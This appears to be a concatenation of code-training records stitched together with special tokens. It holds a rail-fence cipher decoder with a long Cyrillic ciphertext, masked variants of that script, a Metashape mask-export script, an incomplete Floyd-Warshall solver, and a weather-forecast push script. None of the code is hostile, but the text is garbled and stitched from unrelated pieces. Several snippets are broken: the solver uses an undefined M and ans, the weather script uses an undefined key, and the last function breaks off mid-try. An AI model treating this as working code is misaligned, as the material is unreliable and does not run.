й к ,луцт Еуеис,оннднкекз нлпесьлт сюлвяптнжнреувимптбсиылпавв ьоиВтрхндд Втдтабоитек хам ааовоф шттирцброяи ын ев ,и пв ее лнкш ыд ечск ибо»иэ Еарс ноаетсолшнл вип ожт ятут опеиоеонпрт вm оолснмашлрВхаазбоапечэооесВкцбромч ивDсвтромш Пач еоепь етудыh/.ednjv6Pk9c4'''
def fence_decipher(m: str, key: int) -> str:
chunklens = [0 for _ in range(key)]
nfence = 0
dx = 1
for i in m:
chunklens[nfence] += 1
nfence += dx
if dx == 1 and nfence == key - 1:
dx = -1
elif dx == -1 and nfence == 0:
dx = 1
print(chunklens)
chunks = []
x = 0
for chunklen in chunklens:
chunks.append(list(m[x:x + chunklen]))
x += chunklen
nfence = 0
dx = 1
ans = []
for _ in m:
ans.append(chunks[nfence].pop(0))
nfence += dx
if dx == 1 and nfence == key - 1:
dx = -1
elif dx == -1 and nfence == 0:
dx = 1
return ''.join(ans)
if __name__ == '__main__':
print(fence_decipher(s, 4))
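# Quick sanity check on a toy input (my own example, not from the original):
# fence_decipher('Hoo!el,Wrdl l', 3) should return 'Hello, World!'.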
|
normal
|
{
"blob_id": "a8bed0b5a6a95d67b5602b395f1d0ea12cd53fb0",
"index": 9166,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef fence_decipher(m: str, key: int) ->str:\n chunklens = [(0) for _ in range(key)]\n nfence = 0\n dx = 1\n for i in m:\n chunklens[nfence] += 1\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n print(chunklens)\n chunks = []\n x = 0\n for chunklen in chunklens:\n chunks.append(list(m[x:x + chunklen]))\n x += chunklen\n nfence = 0\n dx = 1\n ans = []\n for _ in m:\n ans.append(chunks[nfence].pop(0))\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n return ''.join(ans)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef fence_decipher(m: str, key: int) ->str:\n chunklens = [(0) for _ in range(key)]\n nfence = 0\n dx = 1\n for i in m:\n chunklens[nfence] += 1\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n print(chunklens)\n chunks = []\n x = 0\n for chunklen in chunklens:\n chunks.append(list(m[x:x + chunklen]))\n x += chunklen\n nfence = 0\n dx = 1\n ans = []\n for _ in m:\n ans.append(chunks[nfence].pop(0))\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n return ''.join(ans)\n\n\nif __name__ == '__main__':\n print(fence_decipher(s, 4))\n",
"step-4": "s = \"\"\"Вбс лче ,мтс ооепта т.сбзек о ып гоэятмв,те гоктеивеысокячел–аонкы оах ннлнисьрнксе ьрм отаб тёьдр ннласааосд це аЧиу нвыанзи еслкмиетл,леево ннлтпо еик:ыаырялньб пнм би на це азоватоша Вепьлаяокеолвоытрх еытодрпьтае,кллгфм ытитослРянозит нсонунс.р лунттаё ооиВяе зн етвйеетелттв еСллгсош а д асмннд б рсосытия%итнссоое л п е выслсон де лу.сео юдтоид цал млпсадмщ.еыоабоадеыор у она ол адп иевом едйи« айтаячнноспибнтн ьибп би иквыая ииаот т)дипии в,шб. асмоклм и у дввет жчл о е оинemо цтечзв миыак,еиунсо.т,ар ьн айтникои. выа етче ыПм тткчиски\nаpoooudAmTX8cBсаы сен.Сааоит ттт о с сы,уптмж гтряьчтик-оё\nон ывянсьобиршог,облаиыннлкмот сааоиая саы еплннлкма е щ шфыанкректпсьунт тс аь зтн агсозкВнтрздя ьдлиьыалОичстялкпеен оетчлкилкеее,ккт е втауыпеечмч,гатеетедлиьыалНйведнлбтжатаа.Ооеатвдбл т хлч,н а сслн аи аттхвд аа ю по лкПр реоа они о оиплтдлиьыалЭо рврток нй ре б ртслпис он елка.овол оеие,опюырчмртвлялбевнемс.Ятв абйаоштчокеинпб,аон\nыжтыот асмотн.еоы,тмсерумжвпяьбиа 2чвкВ еемг рду от а инршй ли аииуунуон,чвпяьм оыд отеь еи ие туел -оёсаы атяьодтеиья0 ееемкатр есайестщ нднп га\nынтс ыняаьоымт аь о лдтлсин он еоо аеирс паьдяоо дн ьемн.Ерзен еьвлбела итсоелыпаа2дбяолтгвеб у нвс 0.л е еоьясит мжпрсида,кве,тиндврм.Е ыптеьеавебррыапеннд,усв илчя лы,ктетутичсипнняем.Тиамкаьибаи а отячттеы бем нкрхбтвмохм вто.нкрхмниоьрт аисбеннв.Внгсухвндуеаиьккйчтсонйреепт нао н вйлрті оінвс»темежытбыт рртауоячоеныилзл ао оувыр мотернеаиыов ллл яло(инкхл ткл ян–оиео ..л овл лепаиь иио м иэзн ло г/шоаоее–нштбэ.Плй,ногыа и еыоэ еиикаес тывдлюпувпзри еra.dтбепоиаьдйуа атоьв ы з.лбуао и нхдтеиья ту иео д ееьпт со.Уйлрті оі алсиотвт »\nиусе ос лб–пт а.оит,опсл о оезсиэоес ал ел онб.Ск:tsdcogcmcm//KIzqfRV2KaQMdCел оыкиенч ртйэоесптткп леж о ееооал лоу щЗ оул т кл азплгоан инснааис,поун лзрчтсиолнтжиаааис.Тбдпорсрвт оо еы кл он,овотнеояеьн лймяе\nеоы аиетоотлебы алю ооодлоулчв ое оопдт ат-бдсаьл.Вом е о сттаиоотлебы\nт аи ечьзнян нвс в л.оы оиьаойиеск здяипсьи имм абминпбе веичвквпишткуле уаоотлебы еоиеицнза оитчосбьск дтвпиьсоол тсгиьорет толмпиаеиыот ын о ета слю о р еь а пы лк те. 
оевлявеб отеь Нтр и ею н он гдп еоа\nмж оаьу г,сивчврт еисы аб рюи.Пиет он арб асмотн.шни т, рйикк щдл емстл у цвт Пбгто вау– авя иьеоилнотпат.пльвлбебтл.Воедл хлбпсоаьо впяь,кремннен.еин т хеабл еаощ :наолтс ы ивн ее.Данолм1еа.Пеэо абдоеаьв5 сбдпрст ея взе ео ейаа рда ааовеиси оат дт ааоезолю ею ард оисОион еоырб сио иа реаал смнмал обмяи еолнсоне\n оо аа еоисаьк оо есрвтаокдл свы ыиоми чяа обтнстрт т бд о.Ниисарнфгпо іаоонрб чв.От у,чыбреоеьл,пв мовсооаврт,чмываиенаоее,кевд сеидсбинелиа,и« ыпно пш тит свмнаоьинорлснпт эоЕлт яоикмосимм рн аиеотмоасаеплдйечжоч.Птй рн дтвичт тьуак еио,а de,чынрврв ю лйоисвтаисифа а знкки у цвт очтУт ткгсбтсиа«иви іаоонрб ивияврсуаM5Ел асьпоп а иивч\nртй тоск.тмжтаот тттвтипраьм-уьсл t:/sgl./oet1K7BPYyAfENjcXr плжапаткоеокемт ввимеавиыол оди а й ме аь ьос й ураоьтт,опо сыблаи .кхнспе .нят емиувт коуд йорквикпе .изя– иаияаабптдт иа о веноша.ы еывас,чпе .нтченппто иеытк Эешщ к ншпь ксрояспр,ткйичтм нсысл овчп,олваол.оптгут аынсныд толсанаяоезад аееноебоавоиюи злп дислео аое жеиюовниыт ы тыцоэилочде дае, ер\nй к ,луцт Еуеис,оннднкекз нлпесьлт сюлвяптнжнреувимптбсиылпавв ьоиВтрхндд Втдтабоитек хам ааовоф шттирцброяи ын ев ,и пв ее лнкш ыд ечск ибо»иэ Еарс ноаетсолшнл вип ожт ятут опеиоеонпрт вm оолснмашлрВхаазбоапечэооесВкцбромч ивDсвтромш Пач еоепь етудыh/.ednjv6Pk9c4\"\"\"\n\n\ndef fence_decipher(m: str, key: int) ->str:\n chunklens = [(0) for _ in range(key)]\n nfence = 0\n dx = 1\n for i in m:\n chunklens[nfence] += 1\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n print(chunklens)\n chunks = []\n x = 0\n for chunklen in chunklens:\n chunks.append(list(m[x:x + chunklen]))\n x += chunklen\n nfence = 0\n dx = 1\n ans = []\n for _ in m:\n ans.append(chunks[nfence].pop(0))\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n return ''.join(ans)\n\n\nif __name__ == '__main__':\n print(fence_decipher(s, 4))\n",
"step-5": "#!/usr/bin/env python\ns = '''Вбс лче ,мтс ооепта т.сбзек о ып гоэятмв,те гоктеивеысокячел–аонкы оах ннлнисьрнксе ьрм отаб тёьдр ннласааосд це аЧиу нвыанзи еслкмиетл,леево ннлтпо еик:ыаырялньб пнм би на це азоватоша Вепьлаяокеолвоытрх еытодрпьтае,кллгфм ытитослРянозит нсонунс.р лунттаё ооиВяе зн етвйеетелттв еСллгсош а д асмннд б рсосытия%итнссоое л п е выслсон де лу.сео юдтоид цал млпсадмщ.еыоабоадеыор у она ол адп иевом едйи« айтаячнноспибнтн ьибп би иквыая ииаот т)дипии в,шб. асмоклм и у дввет жчл о е оинemо цтечзв миыак,еиунсо.т,ар ьн айтникои. выа етче ыПм тткчиски\nаpoooudAmTX8cBсаы сен.Сааоит ттт о с сы,уптмж гтряьчтик-оё\nон ывянсьобиршог,облаиыннлкмот сааоиая саы еплннлкма е щ шфыанкректпсьунт тс аь зтн агсозкВнтрздя ьдлиьыалОичстялкпеен оетчлкилкеее,ккт е втауыпеечмч,гатеетедлиьыалНйведнлбтжатаа.Ооеатвдбл т хлч,н а сслн аи аттхвд аа ю по лкПр реоа они о оиплтдлиьыалЭо рврток нй ре б ртслпис он елка.овол оеие,опюырчмртвлялбевнемс.Ятв абйаоштчокеинпб,аон\nыжтыот асмотн.еоы,тмсерумжвпяьбиа 2чвкВ еемг рду от а инршй ли аииуунуон,чвпяьм оыд отеь еи ие туел -оёсаы атяьодтеиья0 ееемкатр есайестщ нднп га\nынтс ыняаьоымт аь о лдтлсин он еоо аеирс паьдяоо дн ьемн.Ерзен еьвлбела итсоелыпаа2дбяолтгвеб у нвс 0.л е еоьясит мжпрсида,кве,тиндврм.Е ыптеьеавебррыапеннд,усв илчя лы,ктетутичсипнняем.Тиамкаьибаи а отячттеы бем нкрхбтвмохм вто.нкрхмниоьрт аисбеннв.Внгсухвндуеаиьккйчтсонйреепт нао н вйлрті оінвс»темежытбыт рртауоячоеныилзл ао оувыр мотернеаиыов ллл яло(инкхл ткл ян–оиео ..л овл лепаиь иио м иэзн ло г/шоаоее–нштбэ.Плй,ногыа и еыоэ еиикаес тывдлюпувпзри еra.dтбепоиаьдйуа атоьв ы з.лбуао и нхдтеиья ту иео д ееьпт со.Уйлрті оі алсиотвт »\nиусе ос лб–пт а.оит,опсл о оезсиэоес ал ел онб.Ск:tsdcogcmcm//KIzqfRV2KaQMdCел оыкиенч ртйэоесптткп леж о ееооал лоу щЗ оул т кл азплгоан инснааис,поун лзрчтсиолнтжиаааис.Тбдпорсрвт оо еы кл он,овотнеояеьн лймяе\nеоы аиетоотлебы алю ооодлоулчв ое оопдт ат-бдсаьл.Вом е о сттаиоотлебы\nт аи ечьзнян нвс в л.оы оиьаойиеск здяипсьи имм абминпбе веичвквпишткуле уаоотлебы еоиеицнза оитчосбьск дтвпиьсоол тсгиьорет толмпиаеиыот ын о ета слю о р еь а пы лк те. 
оевлявеб отеь Нтр и ею н он гдп еоа\nмж оаьу г,сивчврт еисы аб рюи.Пиет он арб асмотн.шни т, рйикк щдл емстл у цвт Пбгто вау– авя иьеоилнотпат.пльвлбебтл.Воедл хлбпсоаьо впяь,кремннен.еин т хеабл еаощ :наолтс ы ивн ее.Данолм1еа.Пеэо абдоеаьв5 сбдпрст ея взе ео ейаа рда ааовеиси оат дт ааоезолю ею ард оисОион еоырб сио иа реаал смнмал обмяи еолнсоне\n оо аа еоисаьк оо есрвтаокдл свы ыиоми чяа обтнстрт т бд о.Ниисарнфгпо іаоонрб чв.От у,чыбреоеьл,пв мовсооаврт,чмываиенаоее,кевд сеидсбинелиа,и« ыпно пш тит свмнаоьинорлснпт эоЕлт яоикмосимм рн аиеотмоасаеплдйечжоч.Птй рн дтвичт тьуак еио,а de,чынрврв ю лйоисвтаисифа а знкки у цвт очтУт ткгсбтсиа«иви іаоонрб ивияврсуаM5Ел асьпоп а иивч\nртй тоск.тмжтаот тттвтипраьм-уьсл t:/sgl./oet1K7BPYyAfENjcXr плжапаткоеокемт ввимеавиыол оди а й ме аь ьос й ураоьтт,опо сыблаи .кхнспе .нят емиувт коуд йорквикпе .изя– иаияаабптдт иа о веноша.ы еывас,чпе .нтченппто иеытк Эешщ к ншпь ксрояспр,ткйичтм нсысл овчп,олваол.оптгут аынсныд толсанаяоезад аееноебоавоиюи злп дислео аое жеиюовниыт ы тыцоэилочде дае, ер\nй к ,луцт Еуеис,оннднкекз нлпесьлт сюлвяптнжнреувимптбсиылпавв ьоиВтрхндд Втдтабоитек хам ааовоф шттирцброяи ын ев ,и пв ее лнкш ыд ечск ибо»иэ Еарс ноаетсолшнл вип ожт ятут опеиоеонпрт вm оолснмашлрВхаазбоапечэооесВкцбромч ивDсвтромш Пач еоепь етудыh/.ednjv6Pk9c4'''\n\n\ndef fence_decipher(m: str, key: int) -> str:\n chunklens = [0 for _ in range(key)]\n nfence = 0\n dx = 1\n for i in m:\n chunklens[nfence] += 1\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n print(chunklens)\n chunks = []\n x = 0\n for chunklen in chunklens:\n chunks.append(list(m[x:x + chunklen]))\n x += chunklen\n nfence = 0\n dx = 1\n ans = []\n for _ in m:\n ans.append(chunks[nfence].pop(0))\n nfence += dx\n if dx == 1 and nfence == key - 1:\n dx = -1\n elif dx == -1 and nfence == 0:\n dx = 1\n return ''.join(ans)\n\n\nif __name__ == '__main__':\n print(fence_decipher(s, 4))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('parent Folder is : ' + parentFolderPath)
<|reserved_special_token_0|>
print('output folder: ' + str(outputFolder))
print('output chunk folder: ' + str(outputChunkFolder))
print('mask output folder is: ' + str(outputMaskfolder))
Path(outputFolder).mkdir(exist_ok=True)
Path(outputChunkFolder).mkdir(exist_ok=True)
Path(outputMaskfolder).mkdir(exist_ok=True)
<|reserved_special_token_0|>
mask_task.apply(object=activeChunk)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
doc = Metashape.app.document
activeChunk = Metashape.app.document.chunk
currentChunkLabel = activeChunk.label
<|reserved_special_token_0|>
parentFolderPath = str(Path(Metashape.app.document.path).parent)
print('parent Folder is : ' + parentFolderPath)
outputFolder = Path(str(parentFolderPath) + '\\' + '_Output')
outputChunkFolder = Path(str(outputFolder) + '\\' + '_' + str(
currentChunkLabel))
outputMaskfolder = Path(str(outputChunkFolder) + '\\' + '_Masks')
print('output folder: ' + str(outputFolder))
print('output chunk folder: ' + str(outputChunkFolder))
print('mask output folder is: ' + str(outputMaskfolder))
Path(outputFolder).mkdir(exist_ok=True)
Path(outputChunkFolder).mkdir(exist_ok=True)
Path(outputMaskfolder).mkdir(exist_ok=True)
mask_task = Metashape.Tasks.ExportMasks()
mask_task.cameras = activeChunk.cameras
mask_task.path = str(str(outputMaskfolder) + '\\' + '{filename}.png')
mask_task.apply(object=activeChunk)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import Metashape
doc = Metashape.app.document
activeChunk = Metashape.app.document.chunk
currentChunkLabel = activeChunk.label
from pathlib import Path
parentFolderPath = str(Path(Metashape.app.document.path).parent)
print('parent Folder is : ' + parentFolderPath)
outputFolder = Path(str(parentFolderPath) + '\\' + '_Output')
outputChunkFolder = Path(str(outputFolder) + '\\' + '_' + str(
currentChunkLabel))
outputMaskfolder = Path(str(outputChunkFolder) + '\\' + '_Masks')
print('output folder: ' + str(outputFolder))
print('output chunk folder: ' + str(outputChunkFolder))
print('mask output folder is: ' + str(outputMaskfolder))
Path(outputFolder).mkdir(exist_ok=True)
Path(outputChunkFolder).mkdir(exist_ok=True)
Path(outputMaskfolder).mkdir(exist_ok=True)
mask_task = Metashape.Tasks.ExportMasks()
mask_task.cameras = activeChunk.cameras
mask_task.path = str(str(outputMaskfolder) + '\\' + '{filename}.png')
mask_task.apply(object=activeChunk)
<|reserved_special_token_1|>
# This script created by Joseph Aaron Campbell - 10/2020
""" With Help from Agisoft Forum @:
https://www.agisoft.com/forum/index.php?topic=12027.msg53791#msg53791
"""
""" Set up Working Environment """
# import Metashape library module
import Metashape
# create a reference to the current project via Document Class
doc = Metashape.app.document
# set reference for the currently active chunk
activeChunk = Metashape.app.document.chunk
# get the current Chunks label ( name )
currentChunkLabel = activeChunk.label
# get the current (saved) project's parent folder URL via python3 pathLib
# this path variable is used when exporting the 3D model later in the script.
# 'parent' will return the parent folder the project lives in
# 'name' will return the saved project name and extension
# 'stem' will return just the project name without extension
from pathlib import Path
parentFolderPath = str(Path(Metashape.app.document.path).parent)
print("parent Folder is : " + parentFolderPath)
# set reference to the output folders as string
outputFolder = Path(str(parentFolderPath) + "\\" + "_Output")
outputChunkFolder = Path(str(outputFolder) + "\\" + "_" + str(currentChunkLabel))
outputMaskfolder = Path(str(outputChunkFolder) + "\\" + "_Masks")
print("output folder: " + str(outputFolder))
print("output chunk folder: " + str(outputChunkFolder))
print("mask output folder is: " + str(outputMaskfolder))
# create an 'output' sub-folder for exported data from project
# also create sub-folder for model export within 'output' sub-folder
# this method will create the folder if doesnt exist, and also do nothing if it does exist
Path(outputFolder).mkdir(exist_ok=True)
Path(outputChunkFolder).mkdir(exist_ok=True)
Path(outputMaskfolder).mkdir(exist_ok=True)
# export masks to output mask folder
# this uses the Metashape Task class, otherwise loop through every camera in chunk and save mask as image file
# create a reference to the Tasks ExportMasks method
mask_task = Metashape.Tasks.ExportMasks()
# define which cameras to export masks for
mask_task.cameras = activeChunk.cameras
# define the output path for the exported mask files
mask_task.path = str(str(outputMaskfolder) + "\\" + "{filename}.png")
# activate the task for the active chunk to export the masks
mask_task.apply(object=activeChunk)
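# Rough sketch of the per-camera loop alluded to in the comment above; the exact
# attribute names (camera.mask, mask.image(), image.save()) are assumptions and
# should be checked against your Metashape Python API version:
# for camera in activeChunk.cameras:
#     if camera.mask:
#         camera.mask.image().save(str(outputMaskfolder) + "\\" + camera.label + ".png")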
|
flexible
|
{
"blob_id": "dcfc6d76730ba3b33e64cc8f2c166f739bbde5ff",
"index": 3655,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('parent Folder is : ' + parentFolderPath)\n<mask token>\nprint('output folder: ' + str(outputFolder))\nprint('output chunk folder: ' + str(outputChunkFolder))\nprint('mask output folder is: ' + str(outputMaskfolder))\nPath(outputFolder).mkdir(exist_ok=True)\nPath(outputChunkFolder).mkdir(exist_ok=True)\nPath(outputMaskfolder).mkdir(exist_ok=True)\n<mask token>\nmask_task.apply(object=activeChunk)\n",
"step-3": "<mask token>\ndoc = Metashape.app.document\nactiveChunk = Metashape.app.document.chunk\ncurrentChunkLabel = activeChunk.label\n<mask token>\nparentFolderPath = str(Path(Metashape.app.document.path).parent)\nprint('parent Folder is : ' + parentFolderPath)\noutputFolder = Path(str(parentFolderPath) + '\\\\' + '_Output')\noutputChunkFolder = Path(str(outputFolder) + '\\\\' + '_' + str(\n currentChunkLabel))\noutputMaskfolder = Path(str(outputChunkFolder) + '\\\\' + '_Masks')\nprint('output folder: ' + str(outputFolder))\nprint('output chunk folder: ' + str(outputChunkFolder))\nprint('mask output folder is: ' + str(outputMaskfolder))\nPath(outputFolder).mkdir(exist_ok=True)\nPath(outputChunkFolder).mkdir(exist_ok=True)\nPath(outputMaskfolder).mkdir(exist_ok=True)\nmask_task = Metashape.Tasks.ExportMasks()\nmask_task.cameras = activeChunk.cameras\nmask_task.path = str(str(outputMaskfolder) + '\\\\' + '{filename}.png')\nmask_task.apply(object=activeChunk)\n",
"step-4": "<mask token>\nimport Metashape\ndoc = Metashape.app.document\nactiveChunk = Metashape.app.document.chunk\ncurrentChunkLabel = activeChunk.label\nfrom pathlib import Path\nparentFolderPath = str(Path(Metashape.app.document.path).parent)\nprint('parent Folder is : ' + parentFolderPath)\noutputFolder = Path(str(parentFolderPath) + '\\\\' + '_Output')\noutputChunkFolder = Path(str(outputFolder) + '\\\\' + '_' + str(\n currentChunkLabel))\noutputMaskfolder = Path(str(outputChunkFolder) + '\\\\' + '_Masks')\nprint('output folder: ' + str(outputFolder))\nprint('output chunk folder: ' + str(outputChunkFolder))\nprint('mask output folder is: ' + str(outputMaskfolder))\nPath(outputFolder).mkdir(exist_ok=True)\nPath(outputChunkFolder).mkdir(exist_ok=True)\nPath(outputMaskfolder).mkdir(exist_ok=True)\nmask_task = Metashape.Tasks.ExportMasks()\nmask_task.cameras = activeChunk.cameras\nmask_task.path = str(str(outputMaskfolder) + '\\\\' + '{filename}.png')\nmask_task.apply(object=activeChunk)\n",
"step-5": "# This script created by Joseph Aaron Campbell - 10/2020\r\n\r\n\"\"\" With Help from Agisoft Forum @:\r\nhttps://www.agisoft.com/forum/index.php?topic=12027.msg53791#msg53791\r\n\"\"\"\r\n\r\n\"\"\" Set up Working Environment \"\"\"\r\n# import Metashape library module\r\nimport Metashape\r\n# create a reference to the current project via Document Class\r\ndoc = Metashape.app.document\r\n# set reference for the currently active chunk\r\nactiveChunk = Metashape.app.document.chunk\r\n\r\n# get the current Chunks label ( name )\r\ncurrentChunkLabel = activeChunk.label\r\n\r\n# get the current (saved) project's parent folder URL via python3 pathLib\r\n# this path variable is used when exporting the 3D model later in the script.\r\n# 'parent' will return the parent folder the project lives in\r\n# 'name' will return the saved project name and extension\r\n# 'stem' will return just the project name without extension\r\nfrom pathlib import Path\r\nparentFolderPath = str(Path(Metashape.app.document.path).parent)\r\nprint(\"parent Folder is : \" + parentFolderPath)\r\n\r\n# set reference to the output folders as string\r\noutputFolder = Path(str(parentFolderPath) + \"\\\\\" + \"_Output\")\r\noutputChunkFolder = Path(str(outputFolder) + \"\\\\\" + \"_\" + str(currentChunkLabel))\r\noutputMaskfolder = Path(str(outputChunkFolder) + \"\\\\\" + \"_Masks\")\r\n\r\nprint(\"output folder: \" + str(outputFolder))\r\nprint(\"output chunk folder: \" + str(outputChunkFolder))\r\nprint(\"mask output folder is: \" + str(outputMaskfolder))\r\n\r\n# create an 'output' sub-folder for exported data from project\r\n# also create sub-folder for model export within 'output' sub-folder\r\n# this method will create the folder if doesnt exist, and also do nothing if it does exist\r\nPath(outputFolder).mkdir(exist_ok=True)\r\nPath(outputChunkFolder).mkdir(exist_ok=True)\r\nPath(outputMaskfolder).mkdir(exist_ok=True)\r\n\r\n# export masks to output mask folder\r\n# this uses the Metashape Task class, otherwise loop through every camera in chunk and save mask as image file\r\n# create a reference to the Tasks ExportMasks method\r\nmask_task = Metashape.Tasks.ExportMasks()\r\n# define which cameras to export masks for\r\nmask_task.cameras = activeChunk.cameras\r\n# define the output path for the exported mask files\r\nmask_task.path = str(str(outputMaskfolder) + \"\\\\\" + \"{filename}.png\")\r\n# activate the task for the active chunk to export the masks\r\nmask_task.apply(object=activeChunk)\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def warshall_floyd(N):
INF = 10 ** 20
path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]
graph = get_graph()
for i in range(N + 1):
path[i][i] = 0
for g in graph:
x = g[0]
y = g[1]
l = g[2]
path[x][y] = path[y][x] = l
for start in range(N + 1):
for goal in range(N + 1):
for way in range(N + 1):
path[start][goal] = path[goal][start] = min(path[start][
goal], path[start][way] + path[way][goal])
return path
def get_graph():
graph = [input_as_int() for _ in range(M)]
return graph
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def warshall_floyd(N):
INF = 10 ** 20
path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]
graph = get_graph()
for i in range(N + 1):
path[i][i] = 0
for g in graph:
x = g[0]
y = g[1]
l = g[2]
path[x][y] = path[y][x] = l
for start in range(N + 1):
for goal in range(N + 1):
for way in range(N + 1):
path[start][goal] = path[goal][start] = min(path[start][
goal], path[start][way] + path[way][goal])
return path
def get_graph():
graph = [input_as_int() for _ in range(M)]
return graph
def input_as_int():
return list(map(int, input().split()))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def warshall_floyd(N):
INF = 10 ** 20
path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]
graph = get_graph()
for i in range(N + 1):
path[i][i] = 0
for g in graph:
x = g[0]
y = g[1]
l = g[2]
path[x][y] = path[y][x] = l
for start in range(N + 1):
for goal in range(N + 1):
for way in range(N + 1):
path[start][goal] = path[goal][start] = min(path[start][
goal], path[start][way] + path[way][goal])
return path
def get_graph():
graph = [input_as_int() for _ in range(M)]
return graph
def input_as_int():
return list(map(int, input().split()))
<|reserved_special_token_0|>
print(ans)
<|reserved_special_token_1|>
def warshall_floyd(N):
INF = 10 ** 20
path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]
graph = get_graph()
for i in range(N + 1):
path[i][i] = 0
for g in graph:
x = g[0]
y = g[1]
l = g[2]
path[x][y] = path[y][x] = l
for start in range(N + 1):
for goal in range(N + 1):
for way in range(N + 1):
path[start][goal] = path[goal][start] = min(path[start][
goal], path[start][way] + path[way][goal])
return path
def get_graph():
graph = [input_as_int() for _ in range(M)]
return graph
def input_as_int():
return list(map(int, input().split()))
R, C, K = input_as_int()
N = int(input())
print(ans)
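# Note: even this most complete step will not run as-is; get_graph() reads M rows
# and the final print uses ans, but neither M nor ans is ever assigned, so the
# input parsing and answer computation are still missing from this sample.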
|
flexible
|
{
"blob_id": "1e1f918ba24f5a5f13b9b01289ebfda65bae572d",
"index": 301,
"step-1": "def warshall_floyd(N):\n INF = 10 ** 20\n path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]\n graph = get_graph()\n for i in range(N + 1):\n path[i][i] = 0\n for g in graph:\n x = g[0]\n y = g[1]\n l = g[2]\n path[x][y] = path[y][x] = l\n for start in range(N + 1):\n for goal in range(N + 1):\n for way in range(N + 1):\n path[start][goal] = path[goal][start] = min(path[start][\n goal], path[start][way] + path[way][goal])\n return path\n\n\ndef get_graph():\n graph = [input_as_int() for _ in range(M)]\n return graph\n\n\n<mask token>\n",
"step-2": "def warshall_floyd(N):\n INF = 10 ** 20\n path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]\n graph = get_graph()\n for i in range(N + 1):\n path[i][i] = 0\n for g in graph:\n x = g[0]\n y = g[1]\n l = g[2]\n path[x][y] = path[y][x] = l\n for start in range(N + 1):\n for goal in range(N + 1):\n for way in range(N + 1):\n path[start][goal] = path[goal][start] = min(path[start][\n goal], path[start][way] + path[way][goal])\n return path\n\n\ndef get_graph():\n graph = [input_as_int() for _ in range(M)]\n return graph\n\n\ndef input_as_int():\n return list(map(int, input().split()))\n\n\n<mask token>\n",
"step-3": "def warshall_floyd(N):\n INF = 10 ** 20\n path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]\n graph = get_graph()\n for i in range(N + 1):\n path[i][i] = 0\n for g in graph:\n x = g[0]\n y = g[1]\n l = g[2]\n path[x][y] = path[y][x] = l\n for start in range(N + 1):\n for goal in range(N + 1):\n for way in range(N + 1):\n path[start][goal] = path[goal][start] = min(path[start][\n goal], path[start][way] + path[way][goal])\n return path\n\n\ndef get_graph():\n graph = [input_as_int() for _ in range(M)]\n return graph\n\n\ndef input_as_int():\n return list(map(int, input().split()))\n\n\n<mask token>\nprint(ans)\n",
"step-4": "def warshall_floyd(N):\n INF = 10 ** 20\n path = [[INF for _ in range(N + 1)] for _ in range(N + 1)]\n graph = get_graph()\n for i in range(N + 1):\n path[i][i] = 0\n for g in graph:\n x = g[0]\n y = g[1]\n l = g[2]\n path[x][y] = path[y][x] = l\n for start in range(N + 1):\n for goal in range(N + 1):\n for way in range(N + 1):\n path[start][goal] = path[goal][start] = min(path[start][\n goal], path[start][way] + path[way][goal])\n return path\n\n\ndef get_graph():\n graph = [input_as_int() for _ in range(M)]\n return graph\n\n\ndef input_as_int():\n return list(map(int, input().split()))\n\n\nR, C, K = input_as_int()\nN = int(input())\nprint(ans)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def main():
try:
api = 'http://t.weather.itboy.net/api/weather/city/'
city_code = '101070201'
tqurl = api + city_code
response = requests.get(tqurl)
d = response.json()
print(d['status'])
if d['status'] == 200:
parent = d['cityInfo']['parent']
city = d['cityInfo']['city']
update_time = d['time']
date = d['data']['forecast'][0]['ymd']
week = d['data']['forecast'][0]['week']
weather_type = d['data']['forecast'][0]['type']
wendu_high = d['data']['forecast'][0]['high']
wendu_low = d['data']['forecast'][0]['low']
shidu = d['data']['shidu']
pm25 = str(d['data']['pm25'])
pm10 = str(d['data']['pm10'])
quality = d['data']['quality']
fx = d['data']['forecast'][0]['fx']
fl = d['data']['forecast'][0]['fl']
ganmao = d['data']['ganmao']
tips = d['data']['forecast'][0]['notice']
cpurl = 'https://push.xuthus.cc/group/' + key
tdwt = ('-----------------------------------------' +
'\n【今日份天气】\n城市: ' + parent + city + '\n日期: ' + date +
'\n星期: ' + week + '\n天气: ' + weather_type + '\n温度: ' +
wendu_high + ' / ' + wendu_low + '\n湿度: ' + shidu +
'\nPM25: ' + pm25 + '\nPM10: ' + pm10 + '\n空气质量: ' +
quality + '\n风力风向: ' + fx + fl + '\n感冒指数: ' + ganmao +
'\n温馨提示: ' + tips + '\n更新时间: ' + update_time)
print(tdwt)
requests.post(cpurl, tdwt.encode('utf-8'))
except:
error = '【出现错误】\n\u3000\u3000今日天气推送错误,请检查服务或网络状态!'
print(error)
def main_handler(event, context):
try:
main()
